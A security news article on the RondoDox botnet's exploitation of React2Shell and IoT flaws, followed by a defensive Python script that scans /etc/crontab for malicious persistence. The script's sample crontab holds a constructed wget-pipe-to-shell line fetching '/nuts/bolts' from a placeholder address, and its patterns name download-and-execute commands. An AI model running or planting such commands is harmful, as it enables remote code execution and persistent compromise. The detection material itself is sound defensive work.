
Cybersecurity researchers have revealed details of an ongoing nine-month campaign targeting Internet of Things (IoT) devices and web applications to enroll them in a botnet known as RondoDox.
As of December 2025, CloudSEK has observed activity leveraging the recently disclosed React2Shell flaw (CVE-2025-55182, CVSS score: 10.0) as an initial access vector, the company said in its analysis.
React2Shell is the name given to a critical security vulnerability in React Server Components (RSC) and Next.js. This vulnerability could allow an unauthenticated attacker to execute remote code on a susceptible device.
According to statistics from the Shadowserver Foundation, as of December 31, 2025, approximately 90,300 instances remain affected by this vulnerability, with 68,400 in the United States, followed by Germany (4,300), France (2,800), and India (1,500).

Emerging in early 2025, RondoDox has expanded by adding new N-day security vulnerabilities to its arsenal, including CVE-2023-1389 and CVE-2025-24893. It is worth noting that the exploitation of React2Shell to spread botnets has previously been noted by Darktrace, Kaspersky, and VulnCheck.
The RondoDox botnet campaign is assessed to have gone through three different stages before exploiting CVE-2025-55182.
March-April 2025 – Initial reconnaissance and manual vulnerability scans
April-June 2025 – Daily large-scale vulnerability investigations of web applications such as WordPress, Drupal, and Struts2, and of IoT devices such as Wavlink routers
July-early December 2025 – Large-scale automated deployments conducted hourly
In an attack detected in December 2025, the attackers allegedly initiated a scan to identify vulnerable Next.js servers and then attempted to drop a cryptocurrency miner (‘/nuts/poop’), a botnet loader and health checker (‘/nuts/bolts’), and a Mirai botnet variant (‘/nuts/x86’) onto infected devices.
“/nuts/bolts” is designed to terminate competing malware and coin miners before downloading the main bot binary from a command and control (C2) server. One variant of this tool was found to remove known botnets, Docker-based payloads, artifacts left by previous campaigns, and associated cron jobs while setting persistence using ‘/etc/crontab’.
“It continuously scans /proc to enumerate running executables and kills non-whitelisted processes approximately every 45 seconds, effectively preventing reinfection by rivals,” CloudSEK said.
To reduce the risk posed by this threat, we recommend that organizations update Next.js to a patched version as soon as possible, segment all IoT devices into dedicated VLANs, deploy a web application firewall (WAF), monitor suspicious process execution, and block known C2 infrastructure.
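Because the loader described above sets persistence through ‘/etc/crontab’, one concrete check a defender can run is an audit of that file for the traits such entries carry: jobs that download and pipe into a shell, run from world-writable directories, reference the ‘/nuts/’ paths seen in this campaign, or fire every minute. The script below is an added example, not CloudSEK's tooling or code from the campaign; the crontab contents and the 203.0.113.10 address are constructed for illustration.

```python
import re

# Constructed /etc/crontab sample (not a captured artifact). The first two jobs
# are ordinary distribution defaults; the last two mimic the shape of persistence
# a loader like "/nuts/bolts" would leave. 203.0.113.10 is a documentation address.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *  * * *  root  cd / && run-parts --report /etc/cron.hourly
25 6  * * *  root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root wget -q -O - http://203.0.113.10/nuts/bolts | sh
@reboot root /tmp/.x86 >/dev/null 2>&1
"""

# Traits worth flagging in a system crontab; tune these for your own environment.
COMMAND_PATTERNS = {
    "download-and-execute": re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"),
    "runs-from-tmp-dir": re.compile(r"(?:^|\s)/(?:tmp|var/tmp|dev/shm)/"),
    "campaign-path-nuts": re.compile(r"/nuts/"),
}
EVERY_MINUTE = re.compile(r"\*(?:\s+\*){4}")  # schedule "* * * * *"

def parse_system_crontab(text):
    """Yield (line_no, schedule, user, command) for each job line in system crontab format."""
    for n, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank line, comment, or environment assignment
        if line.startswith("@"):
            parts = line.split(None, 2)   # @reboot/@daily user command
            if len(parts) == 3:
                yield n, parts[0], parts[1], parts[2]
        else:
            parts = line.split(None, 6)   # five time fields, user, command
            if len(parts) == 7:
                yield n, " ".join(parts[:5]), parts[5], parts[6]

def scan_crontab(text):
    """Return (line_no, user, command, reasons) for every job that trips a heuristic."""
    findings = []
    for n, schedule, user, command in parse_system_crontab(text):
        reasons = [name for name, rx in COMMAND_PATTERNS.items() if rx.search(command)]
        if EVERY_MINUTE.fullmatch(schedule):
            reasons.append("every-minute-schedule")
        if reasons:
            findings.append((n, user, command, reasons))
    return findings
```

Running `scan_crontab` over the real file (`open("/etc/crontab").read()`) flags the two constructed-style entries while leaving the stock hourly and daily jobs alone.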
